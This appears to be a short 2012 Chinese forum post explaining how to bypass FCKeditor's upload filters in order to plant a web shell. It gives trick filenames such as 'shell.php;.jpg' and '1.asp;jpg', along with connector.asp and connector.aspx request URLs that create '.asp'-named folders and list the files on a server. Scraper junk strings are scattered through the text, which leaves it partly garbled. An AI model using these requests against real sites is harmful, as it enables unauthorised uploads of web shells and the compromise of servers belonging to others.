很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg$ I1 @. v8 `$ a9 L3 c8 T; \$ U
, [$ k' n5 A) u7 ~+ W4 l) C提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
, L, v- f# u( _$ h; T4 V# ^, e, k9 @. M) r% N$ I# }5 N
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
4 D" H: I7 M) N: l
, o2 ?, X7 j2 H突破建立文件夹:1 x/ A" z! e2 E9 |6 A% h. r" ]
8 {- v: `( B/ q4 ~editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
7 ]/ _, L6 _6 y
# e* ~8 }: a: A4 x参数:! @8 ]1 j# K# b
" a, V' x( [+ `8 ^( Q+ e
当前目录名:CurrentFolder=/qing.asp! Q6 q3 V0 g8 Q: G3 O
& j- i: d: a1 Q- ?4 P新的目录名:NewFolderName=x.asp
" I4 K9 b) O+ n! \% M# h, ?6 u- _3 Z* _+ f `( Y; g
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
% d( L' K# d+ e- n9 M( Y/ h& b, G2 p5 G
那么 x.asp 就已经建立生成了,此方法百试百灵!, Y; W6 c3 ?0 ^6 v! Q! K3 j8 F
( p+ e% d9 I8 `6 C; k8 C新建文件夹参数 x.asp,基本都能搞定。
4 ~! h( M8 W! q3 T( j% x7 v# j, v7 Q, E/ p$ H
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建2 h' M5 [5 Q- w9 ]1 S4 X
9 _9 N7 i" m8 Y! u5 Baspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp1 f& g. G7 d5 J7 H, D( t8 _
1 [% x0 E9 f9 f( [获取文件列表
' q+ ]8 @ U7 G# a' z" M; ^3 {! a aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
; ^# ?' z8 ?9 [; P
$ N1 a( m+ B; _% x" D |
发表于 2012-12-31 09:27:09
收藏
支持
反对